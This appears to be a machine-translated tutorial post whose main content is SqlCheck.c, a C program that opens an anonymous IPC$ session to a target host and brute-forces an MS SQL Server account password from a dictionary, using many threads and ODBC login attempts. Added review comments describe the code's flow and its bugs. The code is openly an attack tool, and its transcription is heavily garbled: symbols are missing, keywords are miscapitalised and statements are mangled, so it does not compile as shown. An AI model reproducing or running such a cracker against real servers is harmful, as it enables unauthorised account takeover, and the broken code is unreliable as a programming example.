Remote Detection MS SQL Server Account Security

zhaozj2021-02-08  232

ODBC (Open Database Connectivity) is a unified interface standard for accessing remote databases (mainly relational databases). What actually sits beneath ODBC is a database access library that exposes a set of ODBC API functions to the programmer. For the programmer, the ODBC API is effectively a set of dynamic-link libraries (DLLs) that can be called directly from an application. An application operates on a database by calling these ODBC API functions; the overall flow is fairly involved, and one common sequence is: (1) Start the ODBC database application. (2) Establish an IPC session with the server. (3) Create an environment handle for the database application. (4) Create a connection handle. (5) Connect to the data source. (6) Create a statement handle. (7) Perform SQL operations through the statement handle created in the previous step. (8) Release the statement handle. (9) To perform several SQL operations, repeat steps 6-8. (10) Disconnect from the database. (11) Release the connection handle. (12) Release the environment handle. (13) Disconnect the IPC session. (14) The program ends. The whole process of remotely checking an MS SQL Server account password is described below with an example.

/**********************************************************
 * Module Name: SqlCheck.c
 * Date:        2000.12.14
 * Web:         www.patching.net
 * Notices:     Copyright (c) Eyas
 **********************************************************/

#include

#include

#include

#include

#include

#include

#include

#include

File: / / Define global variables

Char Dict [20000] [40], // Password Dictionary

Username [40], // username

Target [40], // Target server

Passwd [40]; // The correct password has been detected

INT TOTAL = 0; // Dictionary quantity

Bool cracked = false; // This value is true when the detection password is successful

Handle HSemaphore, // Beacon kernel object

HEVENT; / / Event kernel object

LONG MAXTHREADS, / / ​​Maximum number of threads

ActiveThreads; // Active thread number

/*
 * usage: print the banner and the command-line synopsis to stdout.
 *
 * pragname: argv[0], substituted into the "usage:" and "example:" lines.
 *
 * NOTE(review): the argument names of the synopsis (target, user name,
 * dictionary path, thread count -- see the argv parsing in main()) were
 * inside <...> in the original and have been stripped by this
 * transcription, which is also why the string literals are broken across
 * lines here. The second printf argument is spelled `prgname` while the
 * parameter is `pragname`; as shown this does not compile.
 */
Void usage (char * pragname)

{

Printf ("/ NPOWER by Eyas

"

"/nhttp://www.patching.net"

"/ N2000 / 12/14"

"/ n / nusage:% s

"

"/ NEXAMPLE:% S 192.168.0.1 Sa c: //pwd.dic 50 / n", pragname, prgname;

Return;

}

/*
 * Readdic: load the dictionary file DIC into the global Dict table.
 *
 * DIC: path of a text file with one candidate per line.
 * Returns 0 on success, 1 if the file cannot be opened.
 *
 * Side effects: fills Dict[] rows 0..Total-1 and sets the global Total
 * (the `Total ;` below is `Total++` with the operator lost in transcription).
 *
 * NOTE(review): fgets() into a 40-byte buffer reads at most 39 characters,
 * so a longer line is split into several entries. strncpy() with
 * STRLEN(TMP)-1 drops the last character whether or not it is a newline
 * (the final line of a file without a trailing newline loses a real
 * character) and writes no terminator of its own; termination relies on
 * Dict being zero-initialised static storage.
 */
Int Readdic (Char * DIC)

{

File * fp;

CHAR TMP [40];

File: // Open a dictionary file

IF ((fp = fopen (DIC, "R")) == NULL)

{

Printf ("/ ncan't open% s", DIC);

Return 1;

}

/* feof() only becomes true after a read fails; the fgets() NULL check below is what actually ends the loop. */
While (! feof (fp))

{

File: // Read one line (at most 39 characters) into the temporary buffer

IF (FGETS (TMP, 40, FP) == NULL)

Break;

File: // Copy the line minus its last character (meant to strip the trailing newline)

STRNCPY (DICT [TOTAL], TMP, STRLEN (TMP) -1); Total ;

/* Keep Total below the 20000 rows Dict provides. */
IF (Total> = 19999)

Break;

}

Fclose (fp);

Return 0;

}

/*
 * connipc: open an IPC$ session to the remote host with WNetAddConnection2.
 *
 * remoteename: host name or address as given on the command line (argv[1]).
 * Returns 0 when the call reports NO_ERROR, 1 otherwise.
 *
 * The user name and password handed to WNetAddConnection2 are both empty
 * strings as transcribed, i.e. an anonymous ("null") session; on a
 * monitored server this attempt is visible as an anonymous session setup.
 *
 * NOTE(review): RN is 30 bytes and is filled by two unchecked strcat()
 * calls; main() copies up to 40 bytes of argv[1] into Target, so a long
 * host name overflows RN. The "// IPC $" suffix reads as the UNC path
 * "\\host\IPC$" in the original; the slashes are flipped in this copy.
 */
Int connipc (char * remoteename)

{

NetResource NR;

DWORD flags = connect_update_profile;

Tchar rn [30] = "",

LN [5] = ""

STRCAT (RN, Remotename);

STRCAT (RN, "// IPC $");

/* No local device name: LN stays an empty string. */
nr.dwtype = resourcetype_disk;

nr.lplocalname = (lptstr) & ln;

nr.lpremotename = (lptstr) & rn;

nr.lpprovider = null;

/* Two empty strings: password and user name for the anonymous session. */
IF (WnetdConnection2 (& NR, (LPSTR) ", (LPSTR)" "", FLAGS) == NO_ERROR)

{

Return 0;

}

Else

{

Return 1;

}

}

/*
 * DelIPC: tear down the IPC$ session opened by connipc().
 *
 * RemoteName: the same host string handed to connipc().
 * Returns 0 when WNetCancelConnection2 reports NO_ERROR, 1 otherwise.
 * The TRUE argument forces the disconnect even if the resource is in use.
 *
 * NOTE(review): lpName is 30 bytes and is filled by unchecked strcat(),
 * the same overflow exposure as RN in connipc().
 *
 * SQLCheck (same line, after DelIPC): thread entry point, one thread per
 * dictionary candidate.
 *
 * PPWD: pointer to one row of Dict (main() passes &DICT[I]).
 * Returns 0 always; the outcome is reported through the globals `cracked`
 * and `Passwd`.
 *
 * Flow: build an ODBC connection string ("Driver={SQL Server};server=...;
 * UID=...;PWD=...;Database=Master") with an unchecked sprintf() into a
 * 200-byte buffer, allocate an environment handle, select ODBC 3
 * behaviour, allocate a connection handle and call SQLDriverConnect().
 * A successful connect sets `cracked`, copies the candidate into Passwd
 * and calls SQLDisconnect(). Every attempt is a full SQL Server login, so
 * where login auditing is enabled each candidate shows up server-side as a
 * failed (or, once, successful) login for that account.
 *
 * NOTE(review): handle-allocation failures call ExitProcess(1) from the
 * worker, ending the whole program without DelIPC() running. The Passwd
 * copy uses strncpy() with sizeof(Passwd) and leaves no terminator when
 * the candidate fills the buffer. The SQLDriverConnect() result test is
 * garbled here (`retcode = SQL_SUCCESS && ...` with a stray `!!`); the
 * intent reads as "neither SQL_SUCCESS nor SQL_SUCCESS_WITH_INFO".
 */
int DelIPC (char * RemoteName) {DWORD ret; TCHAR lpName [30] = ""; strcat (lpName, RemoteName); strcat (lpName, "// ipc $"); ret = WNetCancelConnection2 (lpName, CONNECT_UPDATE_PROFILE, TRUE); IF (RET == NO_ERROR) {RETURN 0;} else {return 1;}} /* --- SQLCheck begins here --- */ DWORD WINAPI SQLCHECK (PVOID PPWD) {file: // Define local variable char szbuffer [1025]; char * pwd; sword swstrlen; sqlhdbc HDBC; SQLHANDLE HENV; SQLRETURN RETCODE; // ODBC API Run Run Run Value Schar ConnsTr [200]; / / Connection Database String Long PreviousCount; File: // Acquired Password PWD = (CHAR *) PPWD; File: / / Construct Connection Database Character Sprintf (Connstr, "Driver = {SQL Server}; server =% s; UID =% S; PWD =% S; Database = Master", target, username, pwd); File: // Puts Conntr); __ try {file: // Create a database application environment handle if (SQLALLOCHANDLE_ENV, SQL_NULL_HANDLE, & HENV)! = SQL_SUCCESS) {Printf ("/ Nallocate Environment Handle Failed./N"; }xitprocess(1); file: // set ODBC version environment if (! SQLSetEnvAttr (henv, SQL_ATTR_ODBC_VERSION, (SQLPOINTER) SQL_OV_ODBC3, SQL_IS_INTEGER) = SQL_SUCCESS) {printf ( "/ nSet the ODBC version environment attribute failed./n");SQLFreeHandle(SQL_HANDLE_ENV, henv EXITPROCESS (1);} file: // creation Connection handle if (! (Retcode = SQLAllocHandle (SQL_HANDLE_DBC, henv, (SQLHDBC FAR *) & hdbc)) = SQL_SUCCESS) {printf ( "/ nAllocate connection handle failed./n");SQLFreeHandle(SQL_HANDLE_ENV, henv); ExitProcess (1 );} file: // data source connection retcode = SQLDriverConnect (hdbc, NULL, ConnStr, strlen (ConnStr), szBuffer, sizeof (szBuffer), & swStrLen, SQL_DRIVER_COMPLETE_REQUIRED); if (retcode = SQL_SUCCESS && retcode = SQL_SUCCESS_WITH_INFO) {!! file: // connection fails, the function terminates file: // printf ( "/ nCouldn't connect to% s MSSQL server./n",target);}else{file:// remote MSSQL Server database connection success Cracked = TRUE Strncpy (Passwd, PWD, SIZEOF (PASSWD)); File: // Disconnects SqldisConnect (HDBC);

/*
 * Continuation of SQLCheck, __finally: free the connection and environment
 * handles, ReleaseSemaphore(HSemaphore, 1, &previous) to give back the slot
 * main() took, compute ActiveThreads = MAXTHREADS - previouscount - 1, and
 * when that is 0 SetEvent(HEVENT) so main() stops waiting; then `return 0`.
 *
 * NOTE(review): HEVENT is created manual-reset and no ResetEvent() appears
 * anywhere, so if ActiveThreads reaches 0 early (a worker finishes before
 * main() starts the next one) the event stays signalled; main()'s final
 * wait then returns at once while later workers may still be running, and
 * the process exits underneath them.
 *
 * main (same line, after SQLCheck): program entry point.
 * argv[1] target host, argv[2] user name, argv[3] dictionary path,
 * argv[4] thread count (must be 1..100, otherwise usage() and return 1).
 * Calls Readdic() then connipc(); returns 1 if either fails. On the next
 * line it creates the semaphore (initial and maximum count both read as
 * MAXTHREADS through the garbling), the manual-reset event, records
 * clock(), and enters the thread-creation loop whose `for` header lost its
 * condition in transcription (presumably `i < Total`).
 *
 * NOTE(review): Target and Username are filled with strncpy(..., sizeof)
 * and are left unterminated when an argument is 40 or more characters.
 */
}}} // end of tyr__finally {file: // Release connection handle SQLFreeHandle (SQL_HANDLE_DBC, HDBC); File: // Release Environment Handle SQLFreeHandle (SQL_HANDLE_ENV, HENV); File: // Increment for the current number of beacons, 1, And get the original value of the original value ReleaseSemaphore (HSemaphore, 1, & prep); file: // Calculate the current active thread number ActiveThreads = maxthreads-previouscount-1; file: //printf ("/ nactivethreads ->% d." , Activethreads); file: // If the number of active thread is 0, then change the event kernel object hevent to a notified state, the program ends if (activethreads == 0) {setEvent (hEvent);}} // end of finallyreturn 0 } int Main (int Argc, char ** argv) {handle hthread; // thread handle DWORD DWTHREADID, DWRET; INT i = 0, err = 0; clock_t start, end; // Start and end time Double Duration; if (argc! = 5) {usage (argv [0]); return 1;} file: // get the target address, user name STRNCPY (Target, Argv [1], SIZEOF (Target)); STRNCPY Username, Argv [2], SIZEOF (UserName)); File: / / A maximum number of threads entered and checks user input Maxthreads = atol (Argv [4]); if ((Maxthreads> 100) || (Maxthreads <1) ) {usage (argv [0]); return 1;} file: // read words in the dictionary to memory in memory (READIC (Argv [3])! = 0) Return 1; file: // with the target machine Established IPC Sessionif (Connipc (Argv [1])! = 0) {Printf ("/ Ncan't Built IPC Null Session!"); Return 1;} else {Printf ("/ NBUILT IPC NULL Sessio n success! 
/ n ");} File: // Create a bezel kernel object, the maximum number of resources, and the number of resources that can be used is maxthreadshsemaphore = createMaphseMaphore = CreateSemaphore (null, maxthreads, maxths, null); if (HSemaphore == null) {Printf ("/ ncreateSemaphore () failed.errorcode:% d.", getLastError ()); return 1;} file: // Create an event kernel object [Artificial reset, the initial state is not notified] HEVENT = CREATEEVENT (NULL , True, false, null; if (hent == null) {printf ("/ ncreateEvent () Failed.errorCode:% D.", GetLastError ()); CloseHandle (HSEMaphore); Return 1;} file: // Start timing start = clock (); file: // Start establishing a thread detection password for (i = 0; i {

/*
 * Loop body: stop once a worker has set `cracked`; print progress;
 * CreateThread(SQLCheck, &DICT[I]); on failure count it in err and show a
 * MessageBox, giving up after 50 failures; CloseHandle() the thread handle
 * (the thread keeps running); Sleep(10); then WaitForSingleObject on
 * HSemaphore. Because the wait comes after CreateThread, up to
 * MAXTHREADS + 1 workers can be alive at once.
 */
File: / / The detection password is successfully jumped out of this cycle

IF (cracked == true)

Break;

File: // Display progress information

Printf ("/ N [% D /% D]% S ->% S ->% S", I 1, Total, Target, User, DICT [i]); File: // Create thread

Hthread = CreateThread (NULL, 0, SQLCHECK, (PVOID) & DICT [I], 0, & DWTHREADID

File: // Process the situation of creating thread errors

IF (hthread == null)

/*
 * Tail of main() after the loop: wait up to 180000 ms (3 minutes) on
 * HEVENT and report WAIT_OBJECT_0 / WAIT_TIMEOUT / WAIT_FAILED; DelIPC();
 * if `cracked`, print the recovered password; print the elapsed clock()
 * time (the duration expression is garbled here; presumably end - start).
 *
 * NOTE(review): on WAIT_TIMEOUT and WAIT_FAILED the program still returns 0
 * with workers possibly running. The `Err ;` below is `err++` with the
 * operator lost in transcription, and the repeated `switch (HEVENT, 180000)`
 * fragment is a copy artifact, not a second wait.
 */
{Err ; MessageBox (Null, "Thread Error", "Error", MB_OK); if (Err> = 50) Break;} closehandle (hthread); Sleep (10); File: // Wait for the label kernel object notification, The number of available resources is greater than 0, continue to create threads, equal to 0 threads enter the waiting state WaitForsingleObject (HSEMaphore, Infinite);} file: // Wait for the event kernel object notification, you will wait 3 minutes dwret = WaitForsingleObject (HEVENT, 180000); switch (HEVENT, 180000); Switch DWRET) {CASE WAIT_OBJECT_0: Printf ("/ Nall Thread Done."); Break; Case Wait_Timeout: Printf ("/ Nwait Time Out.exit."); Break; Case Wait_Failed: Printf ("/ NWAITFORSINGLEOBJECT () Failed." Break;} file: // Disconnect the IPC SessionDelipc (Target) of the target machine; file: // Detecting password after successful return information if (cracked == true) Printf ("/ n / nsuccess!% s SQL Server user [% s] passwd is [% s]. ", Target, username, passwd; file: // end End = clock (); file: // conversion time format duration = (double) START) / clocks_per_sec; file: // Displays the time printf used ("/ n / ncomplete.use% 2.1f seconds./n", duration); Return 0;} The program is compiled in the Windows 2000, VC 6.0 environment.

